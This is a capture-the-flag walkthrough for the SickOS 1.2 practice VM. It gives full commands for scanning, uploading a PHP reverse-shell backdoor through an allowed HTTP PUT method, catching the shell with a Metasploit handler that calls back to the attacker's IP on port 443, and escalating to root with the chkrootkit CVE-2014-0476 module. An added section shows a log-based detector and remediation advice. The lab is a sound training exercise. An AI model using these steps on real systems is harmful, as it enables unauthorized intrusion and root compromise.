Information Security

SickOS 1.2 Walkthrough

 

This machine can be downloaded from:
Set the Network adapter to NAT if you are using VMware.
Find the target's IP address on the local network with the netdiscover command:
    netdiscover
IP: 192.168.236.136
It may be different in your lab.
1.png
Scan the target IP with nmap, using its default port range:
    nmap -A -vv -T4 192.168.236.136
2.png
Two ports are open: 22/tcp and 80/tcp.
Next, scan all TCP ports. To make this quicker we can use zenmap:
  • Type zenmap to open zenmap tool
  • Type the IP in target: 192.168.236.136
  • Choose from profile: Intense scan, all TCP ports
As shown in the screenshot:
    nmap -p 1-65535 -T4 -A -v 192.168.236.136
3.png
Scan all UDP ports:
  • Type the IP in target: 192.168.236.136
  • Choose from profile: Intense scan plus UDP
4.png
The UDP scan didn’t find any useful ports, so we go back to the TCP results.
Since port 80 is open on the target, we browse to it.
We run nikto -h to scan the web server and look for directories on that host:
    nikto -h 192.168.236.136
5.png
As that gave no useful result, we run dirbuster with the medium word-list to look for directories with a different tool:
  • Type http://192.168.236.136 in the target text field.
  • Check Go Faster to speed up the process.
  • Choose the wordlist in /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt.
  • Click Start
6.png
dirbuster finds a “test” directory, so we open it in the browser.
We look at the page and view its source: nothing useful. So we check what the server itself accepts, either via burpsuite or via the curl command, using OPTIONS to see which HTTP methods are allowed on the directory (the Allow header of the response lists them):
    curl -v -X OPTIONS http://192.168.236.136/test
7.png
Now that we know the PUT method is allowed, we can upload our shell either via burpsuite or via Nmap.
Let us prepare the shell first.
I use a ready-made shell that ships with Kali by default, found with:
    locate shell
8.png
Copy the shell and rename it to shell.php:
    cp /usr/share/webshells/php/php-backdoor.php /root/shell.php
Edit shell.php with:
    nano shell.php
9.png
    $ip = '192.168.236.135';   // Kali IP
    $port = 443;               // because 4444 isn’t working
Upload the shell with the nmap http-put script:
    nmap -p 80 192.168.236.136 --script http-put --script-args http-put.url='/test/shell.php',http-put.file='shell.php'
10.png
Successfully created!
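Seen from the defender's side, the upload above leaves a clear trace in the web server's access log: a PUT answered with a success status, followed by a request for the same path. The following check is an added example, not part of the original walkthrough; the log lines are constructed samples in Combined Log Format, and the function names and extension list are assumptions.

```python
import re

# Constructed sample lines (Combined Log Format); not taken from the target VM.
SAMPLE_LOG = """\
192.168.236.135 - - [12/Apr/2016:10:01:07 +0000] "OPTIONS /test HTTP/1.1" 200 0 "-" "curl"
192.168.236.135 - - [12/Apr/2016:10:03:41 +0000] "PUT /test/shell.php HTTP/1.1" 201 0 "-" "nmap"
192.168.236.135 - - [12/Apr/2016:10:05:12 +0000] "GET /test/shell.php HTTP/1.1" 200 0 "-" "browser"
192.168.236.20 - - [12/Apr/2016:10:06:00 +0000] "PUT /test/notes.txt HTTP/1.1" 201 0 "-" "dav-client"
192.168.236.20 - - [12/Apr/2016:10:07:00 +0000] "PUT /test/a.php HTTP/1.1" 403 0 "-" "dav-client"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
SCRIPT_EXT = (".php", ".phtml", ".php5", ".jsp", ".cgi", ".pl")  # assumed list
WRITE_OK = {"200", "201", "204"}  # statuses that mean the PUT was stored

def find_put_uploads(log_text):
    """Return one finding per successfully stored PUT, with any later fetches of it."""
    findings = {}  # path -> finding, kept in log order
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # ignore lines that are not in the expected format
        src, when, method, path, status = m.groups()
        path = path.split("?", 1)[0]  # compare paths without query strings
        if method == "PUT" and status in WRITE_OK:
            findings[path] = {"path": path, "uploader": src, "time": when,
                              "script": path.lower().endswith(SCRIPT_EXT),
                              "fetched_by": []}
        elif method in ("GET", "POST") and status == "200" and path in findings:
            findings[path]["fetched_by"].append(src)
    return list(findings.values())

def severity(finding):
    """Script uploaded and then requested is the pattern of a web shell in use."""
    if finding["script"] and finding["fetched_by"]:
        return "critical"
    if finding["script"]:
        return "high"
    return "review"

if __name__ == "__main__":
    for f in find_put_uploads(SAMPLE_LOG):
        print(severity(f), f["path"], "uploaded by", f["uploader"],
              "fetched by", f["fetched_by"])
```

The durable fix is to disable PUT (or require authentication for it) on the directory and to stop the server from executing scripts out of any location that accepts uploads.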
Now we need a listener. There are two ways: nc -lvp 443 or metasploit, but I prefer metasploit for the privilege escalation later.
We use the payload php/reverse_php because the shell we generated is not a meterpreter one, and that works for me.
Set the local host (Kali IP) and port (443) as we did in the shell previously.
Then we type exploit -jz to run the session in the background.
    msfconsole
    use exploit/multi/handler
    set payload php/reverse_php
    set LHOST 192.168.236.135
    set LPORT 443
    exploit -jz
11.png
Final options:
12.png
Then we request the uploaded shell in the browser:
13.png
Finally we get a user shell, but only as the normal user www-data.
14.png
For privilege escalation, we first check for anything currently running that has root privileges:
    ls -la
15.png
We saw from this line that chkrootkit has root privileges:
drwxr-xr-x  2 john john  4096 Apr 12  2016 chkrootkit-0.49
After searching Google for vulnerabilities, we found the chkrootkit vulnerability CVE-2014-0476, which could allow me to escalate my privileges with a metasploit module:
  • use exploit/unix/local/chkrootkit
  • set session 1
Enter the commands as shown in the image to load the exploit/unix/local/chkrootkit module, then set session 1 and an arbitrary lport such as 8080, and run the module.
For me, I set session 3 because I had already opened sessions 1 and 2.
16.png
Type:
    info
17.png
Check lport with the options command:
18.png
Then type run:
19.png
Session 4 opened, in my case.
Type id to see which account we are running as:
20.png
Now we are root!
Open 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt for the final flag:
    cat 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt
21.png
I hope you enjoy it!
contact me twitter: